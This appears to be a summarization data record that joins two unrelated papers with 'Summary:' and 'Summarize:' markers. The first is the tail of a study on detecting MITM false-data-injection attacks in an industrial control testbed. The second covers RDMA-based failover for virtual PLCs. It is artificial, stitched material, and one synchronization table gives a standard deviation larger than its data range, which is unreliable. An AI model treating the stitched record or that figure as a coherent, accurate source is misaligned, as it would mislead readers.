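    recall = tp / (tp + fn)                       # TPR, Eq. (7)
    precision = tp / (tp + fp)                    # PPV, Eq. (8)
    f1 = 2 * precision * recall / (precision + recall)  # Eq. (9)
    return accuracy, recall, precision, f1
```

For instance, TP = 8, FP = 2, TN = 9, FN = 1 gives an accuracy of 0.85, a precision of 0.8, a recall of 8/9 and an F1 score of 16/19.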
In general, the training speed is directly related to the characteristics of the scheme. For instance, the IF infrastructure is based on a combination of multiple (binary) decision trees, which leads to a considerably fast training speed. On the other hand, the OCSVM scheme calculates the decision boundaries around the data points, and hence its training speed is slow. Table 7 shows the cyber attack detection time (DT) corresponding to the various cyber attack scenarios. Overall, as expected from Table 6, the OCSVM and kNN have the fastest detection times, and by increasing the cyber attack severity (lambda), the cyber attack detection times are generally improved. However, for the IF algorithm, due to high oscillations in the original signal and the effects of the post-processing algorithm, increasing the attack severity does not improve the detection times.

TABLE 6. Performance of the proposed schemes.

TABLE 7. The cyber attack detection time (DT).

FIGURE 11. Cyber attack detection of the PLC3.

Figures 11 and 12 depict the performance of the various cyber attack detection schemes for the scenarios of PLC3 and PLC5, respectively, where the flag "0" represents healthy data and the flag "1" represents cyber attack data. The scaling factors in these figures are lambda = 0.98, 0.96, 0.94 and lambda = 0.92, respectively. It should be noted that PLC 5 is the least sensitive one in terms of cyber attack detection, due to the low number of direct measurements, as provided in Table 4. As shown in Figure 12, this fact leads to the generation of false negative alarms when using IF, while the other algorithms can still detect the attacks on PLC 5 without any false negative alarms.

FIGURE 12. Cyber attack detection of the PLC5.
E. THE COMPUTATIONAL COMPLEXITY
The computational complexity analysis of machine learning algorithms can generally be performed by computing the O-notation of each algorithm, which represents the rate of growth or decline of the algorithm's computational complexity. In the case of the nearest-neighbor-based algorithms, the computational complexity of identifying the nearest neighbors is O(N^2) (where N is the number of samples), and the remaining computations, such as the density or LOF computations, can be ignored (less than 1% of the runtime). The complexity of the single-class SVM-based scheme is difficult to compute, since it depends on the number of support vectors and therefore on the data properties and the characteristics of the results. Furthermore, the tuning of the SVMs that are used has a significant effect on the runtime, as the computations have quadratic complexity. Nevertheless, the complexity of the OCSVM scheme can be scaled between O(dN^2) and O(dN^3), where d denotes the number of features. The computational complexity of the PCA scheme is O(d^2 N + d^3), and thus it relies strongly on the number of measurements. If the number of dimensions is low, the scheme is in practice among the fastest algorithms in our studies. Finally, the complexity of the IF scheme can be obtained as O(t N log N), where t denotes the number of trees [42].

VII. DISCUSSION AND CONCLUSION
In this paper, a hybrid testbed is developed and implemented for an industrial control system (ICS) by simulating the Tennessee Eastman (TE) process in real time as the physical component of the testbed and implementing the other layers of the ICS using Siemens modules, such as PLCs and distributed I/O. Due to the various security aspects of ICS, there are many constraints and challenges in obtaining actual field data.
Therefore, by generating and logging the data from the physical part of the proposed testbed, a dataset as close as possible to real field data is generated. Accordingly, by using this dataset, the impact of various real-time cyber attacks on the system and the corresponding proposed online detection approaches are studied. The Man-In-The-Middle (MITM) cyber attacks are directly implemented on the PROFINET communication protocol, such that the malicious hacker can modify the sensor measurements that are sent to the PLC. Subsequently, several cyber attack detection approaches have been developed and implemented in real time. Table 6 shows the overall performance of each cyber attack detection methodology under various malicious attack scenarios. Furthermore, Table 7 provides the cyber attack detection time for each scheme. Although all the evaluated schemes have been able to detect the cyber attacks before the shutdown of the plant, the OCSVM scheme shows the best performance for this particular application. This study, based on the proposed testbed, can aid in determining the optimum approach for a particular ICS process based on specified constraints (e.g., the plant shutdown condition) and requirements (e.g., the plant production rate). It should be emphasized that none of the previous works in the literature have considered the full Tennessee Eastman process in their developed testbeds. Also, to the best of the authors' knowledge, none of the previous works have used the PROFINET protocol for injecting real-time cyber attacks. Moreover, in most of the previous work, the cyber attack detection algorithms are implemented offline after collecting the data from the testbed, whereas in this work the cyber attack detection schemes are all implemented in real time at the supervisory level of the testbed. Hence, in this work the online performance of our proposed cyber attack detection schemes is demonstrated and provided.
Future work will involve the implementation of more complex multi-point cyber attacks on the testbed and the evaluation of the performance of cyber attack detection and mitigation schemes in real time on the testbed.

ACKNOWLEDGMENT
The statements made herein are solely the responsibility of the authors.
Summary:
Due to the recent increase in the deployment of Cyber-Physical Industrial Control Systems in different critical infrastructures, addressing the cyber-security challenges of these systems is vital for assuring their reliable and secure operation in the presence of malicious cyber attacks. Towards this end, a testbed that generates real-time datasets for critical infrastructure, to be used for the validation of real-time attack detection algorithms, is highly needed. This paper investigates and proposes the design and implementation of a cyber-physical industrial control system testbed where the Tennessee Eastman process is simulated in real time on a PC and the closed-loop controllers are implemented on Siemens PLCs. False data injection cyber attacks are injected into the developed testbed through a man-in-the-middle structure whereby a malicious hacker can modify, in real time, the sensor measurements that are sent to the PLCs. Furthermore, various cyber attack detection algorithms are developed and implemented in real time on the testbed, and their performance and capabilities are compared and evaluated.
|
Summarize:
Index Terms - RDMA, vPLC, state synchronization

I. INTRODUCTION
The advantages of cloud deployments, e.g., resource elasticity, simplified setup and management, and pre-built services for rapid deployments, are well known in the IT sector and are therefore a stable tool in most companies [1]. On the other hand, the automation and process industry has so far been reluctant to adopt these advances, while the need for computing at the factory edge is rising constantly. New use cases and advances in technology, e.g., condition monitoring, big data and computer vision, require more hardware resources than established shop floor IT systems. These use cases are usually realized through hardware appliances deployed directly at the processes. Unfortunately, this brings higher complexity to the shop floor, resulting in more downtime due to more possible points of failure and bigger attack surfaces for IT security threats. Moreover, the roll-out and patch management of these distributed devices can become very complicated and difficult, especially with only small patch windows in automated processes. Therefore, the concept of edge clouds is gaining more and more attention in these environments. However, a simple downsizing and migration of architectures deployed in big data centers to the edge is not sufficient. Different requirements in terms of real-time (RT) behavior, reliability and resiliency are present in the automation domain, which require new solutions that are not yet available in state-of-the-art cloud environments. A use case in this field of applications is the virtualization of Programmable Logic Controllers (PLCs). PLCs are used in the automation and process industry for control functions and the orchestration of processes. Depending on the area of application, the necessary failover time to keep a process running without interruption can be as low as single-digit milliseconds.
The complexity of systems inside the automation domain has to stay relatively low to allow for fault-tolerant systems with quick debugging possibilities and manageability. Moreover, the state-of-the-art control architecture is currently distributed on the shop floor, with PLCs in the field controlling their respective devices. A single hardware fault results in only a single system, i.e., a robot cell, ceasing to work, provided that there is no redundant controller in place to take over. Centralizing multiple PLCs into a cloud infrastructure results in multiple control applications running on one physical host. Here, a single hardware fault has a bigger blast radius and would result in the stop of multiple virtualized PLCs (vPLCs), and hence of a high number of systems in the field, which in turn leads to significantly higher risks and costs following a hardware failure. This scenario illustrates the need for high availability (HA) solutions to benefit from the strengths of cloud infrastructures whilst avoiding single points of failure. This could also be one of the reasons we have not seen major deployments of vPLCs, despite their many advantages and research advances in the past [2], [3].

2023 IEEE 21st International Conference on Industrial Informatics (INDIN) | 978-1-6654-9313-0/23/$31.00 2023 IEEE | DOI: 10.1109/INDIN51400.2023.10218014
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply.

The main contribution of this paper is therefore to provide a first concept for HA of stateful applications with hard RT requirements that is directly applicable to lift-and-shift scenarios of currently hardware-bound applications. The novel paradigm shift directly increases the flexibility and scalability of stateful applications and creates a disruption in businesses like the automation industry, where the selling of hardware-bound
functions can be exchanged with new, scalable, cloud-enabled products. The concept is validated through the modification of a software PLC to demonstrate the advantages and the optimization potential unlocked through consolidation and virtualization. The paper is structured as follows: Section 2 introduces the relevant terminology and technology and gives an overview of state-of-the-art architectures and requirements of PLCs. Based on current architectures, a concept for highly available stateful applications is presented in Section 3 and validated in Section 4 in a prototypical implementation for state synchronization and through a modification of a software PLC in an on-premise environment. In Section 5 the results are discussed. Section 6 covers related work on HA, state synchronization and applications with hard RT requirements on distributed systems. Finally, Section 7 concludes this work with a summary and an outlook on future research paths.

II. BACKGROUND
This section gives an overview of the relevant terminology, technologies and problem statements.

A. RDMA
Remote Direct Memory Access (RDMA) enables data to be synchronized in the main memory of another host without involving the CPU, caches or the operating system (OS) [4]. This results in a significantly higher throughput with low latency at the same time. There exist two main streams of RDMA deployments. Infiniband (IB) relies on a different hardware stack compared to IEEE 802.3. Infiniband Volume 2 [5] describes the physical layer, whereas layers 2-4 in accordance with the OSI reference model [6] are part of Infiniband Volume 1 [7]. A credit-based congestion mechanism ensures lossless transmission [8]. On the other hand, RDMA over Converged Ethernet (RoCE) reuses existing Ethernet standards for the delivery of packets. RoCE v2 introduced routing capabilities by relying on UDP as the underlying transport protocol. For the rest of this work, RoCE denotes RoCE v2 for simplicity.
RoCE assumes lossless transmission of frames. A possible solution is Priority Flow Control, defined in IEEE 802.1Qbb [9]. More recent congestion avoidance mechanisms include DCQCN [10], TIMELY [11] and IRN [9]. Out-of-order (OOO) packets are handled by the IB layer 4 transport mechanisms. Any OOO packets are dropped and cause a retransmission of the respective packets, leading to inefficient communication [7]. Selected manufacturers provide experimental verbs to compensate for that and write into the host memory, e.g., Mellanox starting from their X-5 series [12]. Finally, soft-RoCE allows the usage of non-RDMA-capable Network Interface Cards (NICs) by virtualizing the IB layer 4 functionality [7] that is usually embedded in the hardware of the NICs for performance reasons. Fig. 1 displays the different technologies in comparison to the OSI reference model.

Fig. 1. Infiniband vs. RoCE v2 vs. soft-RoCE vs. TCP/IP in relation to the OSI layer model

B. Programmable Logic Controllers in Automation
PLCs are considered the brain of every automation cell. Every device on the shop floor is directly or indirectly in communication with a PLC, and malfunctioning PLCs usually lead to a standstill. Devices that are controlled by a PLC are often referred to as input/outputs (I/Os). The following subsections give an overview of the evolution of PLCs, of the requirements with regard to state size and failover times, and of the currently available HA solutions.
1) Hardware-bound Infrastructure of Today: The current paradigm in the automation domain is to deploy hardware appliances for every single function; e.g., for AI inference use cases, rugged workstation PCs are directly connected to the related peripherals (cameras, laser and other sensors) and AI inference services run directly on these devices on the shop floor. Hence, the complexity is continuously growing and manageability becomes an issue.
2) Virtualization-based Infrastructure of the Future: The process automation industry has already experienced a shift from hardware- to software-based business models for higher-level management and control functionalities such as distributed control systems. On the other hand, PLCs remain as hardware on the shop floor with limited compute and storage to this day, mostly because of network availability concerns and the missing availability of virtualized PLCs and hypervisors that meet RT constraints [13].
3) Real-Time Requirements of PLCs: Most applications in the automation domain inherit RT requirements. The definition of RT highly depends on the use case or scenario and relates to the usefulness of the system's reaction after not meeting a deadline [14]. Packet loss or delays are tolerable to a certain degree, depending on the underlying process, e.g., due to over-frequent communication of redundant data between the PLC and the I/Os. There exists, however, a hard limit, and therefore hard RT requirements, when it comes to general connection availability. The usage of a watchdog timer is a common way in Industrial Ethernet standards to ensure a working connection. After a packet arrives, a timer is started on the receiver side. If no other packet arrives until the timer hits a
predefined number of milliseconds, usually three times the cycle time or more, the connection is deemed to be lost. This has to be avoided at all costs for many applications, since this scenario usually results in a complete standstill and often requires manual intervention by a human to restart the process. Typical cycle times in the automation domain are between 1 ms and 100 ms, with watchdog timers at 3 ms to 300 ms respectively [15]. The focus of this paper is exclusively on RT communication. Of course, the PLC itself needs to be RT capable, e.g., by running an RT OS and on an RT-capable hypervisor; this is beyond the scope of this work.
4) State Size Requirements: The memory of PLCs can be divided into two subsets, a static and a dynamic one. The static part consists of the static variables and the program, which only changes through active engineering and usually requires recompilation of the code. The dynamic subset consists of either I/O data or internal variables and states. A look at available PLCs on the market reveals a variety of different sizes, depending on their application domain. Examples from Siemens' newest portfolio include maximum static state sizes of 150 KB to 9 MB and dynamic state sizes from 1 MB up to 60 MB, although most models are in the single-digit MB area [16]. Moreover, the 60 MB will not change in every cycle, simply due to limited compute resources and maximum read/write speed. Some real-life data on expected state sizes is provided by Krause in his analysis of various large plants in 2007, resulting in up to single-digit MB [17]. State size requirements of other use cases have not been considered.
5) Redundancy Concepts of PLCs: Redundant controllers are already being deployed today in critical processes, e.g., for the control of vacuum chambers, steam turbines and dehumidifiers [18]. Every major PLC provider uses a similar redundancy concept, e.g., Siemens, Rockwell Automation and Codesys [18]-[20].
A generalized concept is shown in Fig. 2. Reported failover times of the currently available products are around 50 ms, although the corresponding state size is not mentioned [18]. Based on this threshold, it is to be expected that the current solutions do not meet the HA requirements of all current deployments in the automation domain.

Fig. 2. Current redundancy concept of hardware PLCs according to [18]-[20]

III. CONCEPT
The following section describes our concept for HA of stateful applications with hard RT requirements on cloud infrastructures. Although it could be applied to any stateful application, the design target was specifically a vPLC. The base technology for the synchronization of the state is RDMA, which allows for synchronization without involving the CPU or OS by skipping the network stack, compared to the usual data transfer over the network. As previously discussed, this reduces latency and limits the overhead on the CPU. The concept assumes that the RDMA functionality is either provided by a physical NIC or virtualized by a technology such as Single Root Input/Output Virtualization (SR-IOV), Freeflow [21] or MasQ [22]. Even though a concept could be developed for an arbitrary number of worker applications, a more applicable scenario is the usage of a primary and a single backup application, in accordance with the current architecture described in Section II-B5. The concept extends existing non-HA applications by two more responsibilities: role management and state management.

A. Role Management
The role manager handles the definition of the role of the application, i.e., primary or backup. As a basis for this, it receives the initially intended role of the application during initialization. At startup, the role manager opens a connection as a listener and keeps it open for a predefined time.
If the role manager does not receive a signal from a running primary application within the time window, it is assumed that the system is not yet in a running state and the initial value is taken as the current role. The system now enters a running state and the role manager starts to send the current role to its secondary application. If the role manager receives a role during the specified time, it takes over the role based on the given information.
B. State Management
The state manager handles the synchronization of the primary application to the backup. The synchronization consists of two parts, a sender and a listener. The sender cyclically sends the current state to the listener, which applies it to the current application. Moreover, the primary application sends a heartbeat to its backup. If the backup application does not receive a heartbeat within a specified time frame, defined as the timeout time, it assumes that the primary application has failed and takes over its work based on the last received state. The state can consist of several properties of simple and complex data types. Depending on the number of properties and data types, the state can become very large very quickly. Exemplary maximum state sizes for available products on the market are described in Section II-B4.
C. State Synchronization
The state synchronization is based on RDMA, which has many advantageous properties compared to classical UDP-based synchronization, see Section II-A. Fig. 3 pictures the general idea, which utilizes RDMA to write the dynamic contents of the RAM of the primary application into the RAM of the backup application. A shared memory, which is a frequently used technology in the area of synchronization, is not used because current PLCs also rely on RAM synchronization, making the approach easily extensible through RDMA.
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:25 UTC from IEEE Xplore. Restrictions apply.
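The heartbeat-and-takeover behaviour of the state manager described above can be sketched as follows (an illustrative Python model, not the paper's C++ implementation; class and method names are ours):

```python
class BackupStateManager:
    """Sketch of the backup side: it applies each received state and
    promotes itself to primary once no heartbeat arrives in time."""

    def __init__(self, timeout_ms: float):
        self.timeout_ms = timeout_ms
        self.last_heartbeat_ms = 0.0
        self.state = None
        self.role = "backup"

    def on_heartbeat(self, now_ms: float):
        self.last_heartbeat_ms = now_ms

    def on_state(self, now_ms: float, state: bytes):
        self.state = state  # apply the synchronized state

    def tick(self, now_ms: float):
        # Failover: assume the primary has failed and take over its
        # work based on the last received state.
        if self.role == "backup" and now_ms - self.last_heartbeat_ms > self.timeout_ms:
            self.role = "primary"


mgr = BackupStateManager(timeout_ms=3.0)
mgr.on_heartbeat(0.0)
mgr.on_state(0.0, b"cycle-41")
mgr.tick(2.0)   # still within the timeout: remains backup
mgr.tick(4.5)   # heartbeat missed: takes over as primary
assert mgr.role == "primary" and mgr.state == b"cycle-41"
```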
Moreover, the concept is designed to synchronize arbitrary state sizes, as well as to enable synchronization across containers on different hosts. Here, RDMA offers advantages through its flexible application possibilities and advantageous properties. Compared to other technologies, RDMA enables a significantly better transfer rate and latency by omitting the CPU, caches and OS when transferring data to the main memory of another computer, as described in Section II-A. Finally, RT applications are heavily dependent on correct CPU interrupt handling. Offloading functionality into hardware can improve the RT capabilities and is therefore advisable. The concept offers two types of state synchronization, full and partial synchronization.
Fig. 3. Synchronization between two hosts
1) Full Synchronization: With full synchronization, the complete state is synchronized within a specified interval, regardless of whether a variable has changed since the last transmission. This type of synchronization might be suitable for small states, e.g., a maximum size of 1 MB would utilize 1 Gbit/s with an 8 ms synchronization interval. In principle, bigger states can also be synchronized in this way. However, this directly affects the transmission latency and bandwidth utilization and may thus, under certain circumstances, require the timeout time, or respectively the interval between synchronizations, to be increased. A remedy at this point is the heartbeat introduced in Section III-B, which can be transmitted additionally, temporally independent of the state synchronization and possibly at a higher frequency.
2) Partial Synchronization: In addition to full synchronization, the concept also offers the possibility of partial synchronization, in which only the parts of the state that have changed since the last state synchronization are transferred.
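The bandwidth figures above can be checked with a small helper (our own sketch; decimal MB are assumed, which matches the 1 MB per 8 ms = 1 Gbit/s example):

```python
def required_bandwidth_gbit(state_mb: float, interval_ms: float,
                            change_rate: float = 1.0) -> float:
    """Link utilization needed to ship `change_rate` of a `state_mb`
    (decimal MB) state once every `interval_ms` milliseconds."""
    bits = state_mb * change_rate * 1e6 * 8          # payload per interval
    return bits / (interval_ms * 1e-3) / 1e9         # Gbit/s

# Full synchronization of 1 MB every 8 ms needs roughly 1 Gbit/s.
assert abs(required_bandwidth_gbit(1, 8) - 1.0) < 1e-6
# Partial synchronization (10 % change rate) of a 10 MB state costs
# about the same as full synchronization of a 1 MB state.
assert abs(required_bandwidth_gbit(10, 8, change_rate=0.1)
           - required_bandwidth_gbit(1, 8)) < 1e-6
```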
An exemplary scenario with an average rate of change of 10% within the synchronization interval and a 10 MB state could thus be synchronized with the performance required for a 1 MB state.
D. Solution to the Split-Brain Problem
The split-brain problem is a phenomenon observable in distributed systems with enabled HA features. If the connection between primary and backup application is interrupted, the backup application assumes the termination or malfunction of the primary application and therefore takes over as the new primary application. This might lead to two active primary applications, the split brain. Common techniques to solve this problem include a quorum, a witness, and a heartbeat [23], [24]. Since synchronization between three applications results in high hardware utilization, possibly additional license costs and reduced RT capabilities that are not justifiable for every single use case, a quorum might only be a useful alternative for selected use cases. A witness can be deployed to confirm the malfunctioning of an application; without it, the connection between primary and backup application might just be disconnected. The deployment, however, might again add unwanted complexity. Therefore, the concept deploys an additional heartbeat in accordance with current implementations, which offer up to two heartbeats over separate links. A conscious design choice is the transmission of state synchronization and heartbeat over separate network links. This happens for two reasons: First, state synchronization requires a dedicated link to ensure lossless transmission without congestion. As long as the transmission is based on Ethernet, congestion control is an important topic, especially for applications with RT requirements. InfiniBand-based deployments are not possible everywhere due to the requirement of a successful brownfield integration.
Second, client connection and heartbeat have to be on the same link to overcome the split-brain problem without a third entity. In the case of vPLCs, the respective I/Os in the field can function as a witness: after running into an internal timeout, they accept commands from a new controller, confirming that the primary application has been disrupted by sending an acknowledgement to the new primary application.
E. Bumpless High Availability
The final important property of the concept is bumpless HA in failover scenarios. Here, the RT properties of the respective RT process have to be satisfied, e.g., the I/O RT constraints mentioned in Section II-B3. To allow failover times in the single-digit millisecond range, the detection of a failed primary application has to happen in less time than the specified timeout. This is achieved through a high-frequency heartbeat, i.e., one every millisecond. At the same time, the backup application has to be already in a running state to achieve the desired bumpless behaviour. This is done by simultaneous computations on both the primary and the backup application, e.g., in the case of the vPLC the respective task is run on both applications and synchronized at the end of the cycle before changing the output values. Finally, the Industrial Ethernet protocol has to support a bumpless handover between two PLC instances, i.e., the PROFINET S2 standard.
IV. VALIDATION
The validation is conducted with a minimal configuration and is realized as depicted in Fig. 3, with workstations as hosts and RDMA-based state synchronization. Virtualization was not considered in this particular test setup to remove any additional uncertainty sources.
However, the deployment of the prototype on the hyperscaler Microsoft Azure in VMs of the type HB60rs was successful, which proved to be especially helpful for rapid prototyping of the RDMA-related features. Since the timeout, i.e., the watchdog timers in Industrial Ethernet protocols, and the compute time of an IEC task are highly dependent on the respective application, the validation is solely focused on the synchronization of the state between primary and backup PLC. The state synchronization can be varied to accommodate different scenarios and bandwidths, i.e., full and partial synchronization and arbitrary state sizes.
A. Prototype of a Stateful Application
The prototype is developed in the programming language C++ and in accordance with the concept of role and state management defined in Section III. Instead of using the native RDMA library, ibverbs, a wrapper library named Infinity [25] is used, which simplifies the integration of RDMA functionalities into the application. Infinity has been created in the context of Barthel's work on parallel and distributed join algorithms [26], [27].
B. Software PLC with RDMA and UDP-based Synchronization
A second validation is conducted through the modification of the redundancy component of a PLC from CODESYS. The component is programmed in the language C and synchronizes, amongst other things, a buffer of the primary PLC with the buffer of the secondary PLC. Whereas the current implementation relies on UDP and TCP communication between the two applications, our implementation synchronizes the buffer solely by means of RDMA.
C. Synchronization Time Calculation
To calculate the synchronization time, a timestamp t1 is saved every time the primary application initiates a state synchronization through RDMA. On the other side, a timestamp t2 is saved on the host of the backup application once the synchronization has been successful. The timestamps of both hosts are compared to obtain the synchronization time.
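The per-cycle measurement can be sketched as follows (illustrative only; the timestamp values are hypothetical, and both hosts are assumed to share a common clock, which the experimental setup provides via PTP):

```python
import statistics

def sync_time_stats(t1s, t2s):
    """t_sync = t2 - t1 per synchronization, plus the summary
    statistics reported later: min, max, average, standard deviation."""
    tsync = [t2 - t1 for t1, t2 in zip(t1s, t2s)]
    return min(tsync), max(tsync), statistics.mean(tsync), statistics.pstdev(tsync)

# Hypothetical timestamps in milliseconds on primary (t1) and backup (t2).
t1 = [0.0, 10.0, 20.0, 30.0]
t2 = [1.8, 11.9, 21.7, 31.8]
mn, mx, avg, sd = sync_time_stats(t1, t2)
```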
This requires synchronous time on both hosts, which is achieved through the Precision Time Protocol (PTP) time synchronization standardized in IEEE 1588. This results in equation 1 for the synchronization time:
t_sync = t2 - t1 (1)
D. Experimental Setup
Two different workstations are used as hosts for the applications and are further described in Table I. A Mellanox ConnectX-5 NIC is used due to its support for RDMA and PTP. The validation is split into two parts: First, the performance of the synchronization with RDMA is evaluated with a mockup PLC. Second, the concept is applied to a real software PLC from the company CODESYS and compared against the UDP-based original implementation of the synchronization.
TABLE I
EXPERIMENTAL SETUP
          Host #1                 Host #2
CPU       Intel i9-9900           Intel Xeon W-2175
          8x3.1 GHz               14x2.5 GHz
RAM       DDR4 2133 MHz           DDR4 2666 MHz
          4x16 GiB                8x16 GiB
Storage   Samsung SSD 970 EVO     SK hynix PC300 SSD
          500 GB                  1 TB
NIC       Nvidia MCX512A-ACAT     Nvidia MCX512A-ACAT
          2x25 Gbit/s             2x25 Gbit/s
OS        Linux Ubuntu 20.04 LTS  Linux Ubuntu 20.04 LTS
E. Results
The following experiments are based on the synchronization measurement introduced in Section IV-C. The evaluation is split into two parts: First, the mockup PLC is used to validate the benefit of partial synchronization and give an expected range for synchronization times of states by means of RDMA. It is notable that only a contiguous memory area is evaluated in the partial synchronization scenario. Second, a modified CODESYS software PLC based on state synchronization through RDMA is compared to its original UDP-based synchronization.
1) Partial and Full Synchronization: In accordance with Table II, full synchronization is applied for the state sizes 1 MB and 10 MB, and partial synchronization with a change rate of 10% for 10 MB. The table displays the minimum, maximum, average and standard deviation of the synchronization time for the three test scenarios, which were executed 1000 times for 10 s each. Fig. 4.
Synchronization cycle times for 1 MB and 10 MB states and varying synchronization modes with RDMA
The results of the synchronization time are visualized in Fig. 4 as a Cumulative Distribution Function (CDF). A statistical analysis is provided in Table II. As expected, the performance of a partial synchronization is similar to that of a full synchronization of the same transmitted data volume.
TABLE II
STATISTICAL ANALYSIS OF SYNCHRONIZATION TIMES FOR PARTIAL AND FULL SYNCHRONIZATION. UNLESS OTHERWISE DISCLOSED, ALL VALUES ARE IN MILLISECONDS.
State   Synchronization            Min     Max     Avg     SD
1 MB    full                       1.70    1.95    1.85    0.05
10 MB   partial, 10% change rate   1.68    1.94    1.84    0.40
10 MB   full                       13.34   14.13   13.62   0.07
2) Software PLC with RDMA and UDP-based Synchronization: Six different test cases are defined, alternating between the synchronization methods RDMA and UDP as well as changing state sizes of 100 KB, 1 MB and 10 MB. Table III displays the minimum, maximum, average and standard deviation of the synchronization time for the six test scenarios, which were executed 100 times for 10 s each, measured at specific execution points in the vPLC itself with millisecond precision. The results are visualized in Fig. 5 as a probability distribution.
TABLE III
STATISTICAL ANALYSIS OF THE STATE SYNCHRONIZATION TIMES OF THE CODESYS PLC BASED ON UDP/TCP AND RDMA. ALL VALUES ARE IN MILLISECONDS.
Protocol   State Size   Min       Max       Avg       SD
UDP/TCP    100 KB       25.00     51.00     44.47     8.94
RoCE       100 KB       0.00      2.00      0.20      0.40
UDP/TCP    1 MB         245.00    396.00    295.06    35.00
RoCE       1 MB         1.00      2.00      1.63      0.48
UDP/TCP    10 MB        2467.00   3673.00   2529.36   91.33
RoCE       10 MB        15.00     17.00     15.87     0.37
V. DISCUSSION
The following section discusses the presented results and further steps for improvement and enhancement.
A.
Meeting Real-Time Requirements of vPLCs
Compared to available products of today, where we representatively measured the performance of a major software PLC, the presented concept consistently achieves synchronization times in the single-digit millisecond range with state sizes of a few MB, as displayed in Fig. 5. This equals a reduction of the synchronization time of up to 99.39% on average. Moreover, the absolute standard deviation is significantly lower compared to legacy synchronization methods, which enables multiple use cases to be virtualized while fulfilling their respective HA requirements in accordance with Section II-B3.
B. Synchronization Methods
Persistence is gated by the speed of replication. The synchronization of the state through RDMA is the primary functionality that enables HA of stateful applications. Being the key component of the concept, optimizing its mechanisms is highly desirable. A full synchronization of the entire state of the application results in high bandwidth utilization, which is often unnecessary due to the synchronization of unchanged variables of the state and therefore redundant data with no value. As expected, cutting the state into smaller pieces with a partial synchronization, here by a factor of 10, achieves performance comparable to a full synchronization of a tenth of the actual size. However, a random, non-contiguous memory area might slightly reduce the performance of the partial synchronization and should be a target of a future evaluation. Full synchronization is the current default for available products; partial synchronization would require adjustments in the code base of PLC runtimes. The comparison is made to draw attention to the potential and future need, in the context of virtualized PLCs, for a more sophisticated approach, which could be the sole transmission of variables that have changed since the last update cycle.
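One possible change-detection scheme for such a partial synchronization is chunk-level dirty tracking, sketched below (our own illustration of the general idea, not the CODESYS or paper implementation; the 4 KiB chunk size is an arbitrary choice):

```python
def changed_chunks(prev: bytes, cur: bytes, chunk: int = 4096):
    """Split the state into fixed-size chunks and collect only those
    that differ from the last synchronized snapshot, so that only the
    changed fraction of the state has to be transferred."""
    dirty = []
    for off in range(0, len(cur), chunk):
        if cur[off:off + chunk] != prev[off:off + chunk]:
            dirty.append((off, cur[off:off + chunk]))
    return dirty


prev = bytes(10 * 4096)            # 10-chunk state, all zeros
cur = bytearray(prev)
cur[4096:4097] = b"\x01"           # one variable changed inside chunk 1
dirty = changed_chunks(prev, bytes(cur))
# Only 1 of 10 chunks (10 % of the state) would be sent.
assert [off for off, _ in dirty] == [4096]
```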
This way, the smallest amount of bandwidth is needed while still meeting every requirement, assuming a suitable synchronization frequency.
C. RDMA over DetNet
A centralized management of the synchronization of multiple applications with their respective backups might be needed to avoid burst scenarios and a high rate of retransmission, especially with the UDP-based RoCE. Purely application-triggered synchronization is not desirable, given the missing holistic view of the synchronizations on the network and hosts. An implementation based on holistic network-based scheduling is therefore desirable. DetNet, which is currently being standardized by the IETF, could be a suitable technology to ensure deterministic behavior and congestion prevention for routed environments [28]. Therefore, we propose RDMA over DetNet (RoDN) as the next natural evolution step of RoCE, especially in the context of deterministic communication and services. The main reasons for this proposition include deterministic upper- and lower-bound communication with zero congestion and planned resource allocation in a cyclic manner.
D. Extension to Kubernetes and Microservices
Cloud infrastructures are quickly adopting microservice architectures and in turn apply Kubernetes as a management shell. In the context of the vPLC use case, a refactoring of these monolithic applications towards a microservice-based architecture might improve scalability and availability even further. The final goal could be the dissolution of the static 1:1 relationship between a PLC and an I/O in the field, aiming instead for a 1:n architecture with a Kubernetes-managed service. A similar vision is currently being pursued by standards organizations, see, e.g., IEC 61499.
E.
Concept for the Arrangement of Primary and Backup Applications
In order to distribute the computational load in a failover scenario, backup applications of a single host should be evenly distributed over all other available hosts that meet the necessary requirements, such as latency and jitter between hosts, compute and storage. Every host runs an arbitrary number of primary vPLCs and backup vPLCs. In the case of a failover, e.g., the malfunctioning of a host, backup vPLCs that were previously provisioned on all other hosts take over. The computational load is evenly distributed, and by scaling up the number of hosts, the computational overhead in case of a malfunction of a single host is reduced even further for every single backup host.
Fig. 5. Synchronization time per cycle of the CODESYS PLC based on UDP and RoCE for two exemplary state sizes, 1 MB and 10 MB: (a) UDP/TCP, 1 MB; (b) UDP/TCP, 10 MB; (c) RoCE, 1 MB and 10 MB.
F. Limited Design Space
The design space was consciously limited in this work to demonstrate the excellent fit of RDMA for these particular emerging industrial use cases and to motivate the need for further research in that area, i.e., through the suggested partial synchronization method. Subsequent implementations based on the technology stacks discussed in the following section are expected to perform worse than the implemented ad-hoc solution modelled after current synchronization methods, due to a higher amount of computation or data transfer. However, they can have a positive impact on the efficiency of data storage and consistency in failover scenarios, i.e., through distributed consensus algorithms.
VI. RELATED WORK
HA in cloud environments has seen much research activity with a variety of possible solutions [29].
The combination of HA and demands on RT capabilities is much rarer, though, which results in only a handful of publications in that area. There are three major areas where research has taken place around the topics of HA and RT simultaneously: databases, fault tolerance and containers. In addition to the two classic HA approaches for databases, active-active and active-passive, Zamanian et al. developed a new approach, active-memory replication [30]. Here, synchronization takes place by means of RDMA. In the field of HA for VMs, various protocols such as Remus [31] or the FT protocol [32] have been developed. In contrast to the HA of databases, this involves the synchronization and fault tolerance of entire virtual machines, including CPU, cache, and OS. A similar concept to Freeflow [21] is MasQ, which has been applied to HA for VMs [22]. Both concepts are a possible alternative to the usage of SR-IOV. The last major area deals with the HA of containerized applications or microservices. The approaches here enable, for example, state persistence using stateful set controllers and persisted volumes [33] or via a shared memory in interaction with protocols such as DORADO [34]. Another concept in this area is Shimmy, a novel communication interface for microservices based on shared memory and RDMA [35]. The introduction of vPLCs into the automation domain has been suggested before [2], [3]. However, a lift-and-shift approach is not sufficient for these types of applications as long as the cloud infrastructure cannot meet their requirements. Once consolidated into a centralized cloud infrastructure, the network between shop floor and (edge) cloud has to meet RT and HA requirements as well, which were previously only found on the lowest level of the automation pyramid.
Nevertheless, the advantages of a cloud deployment of PLCs, e.g., allocation of hardware resources on demand, simplified patch management and an increase of hardware utilization, are considered to be worth the effort and are likely to transform future infrastructures in the automation domain [13].
VII. CONCLUSION
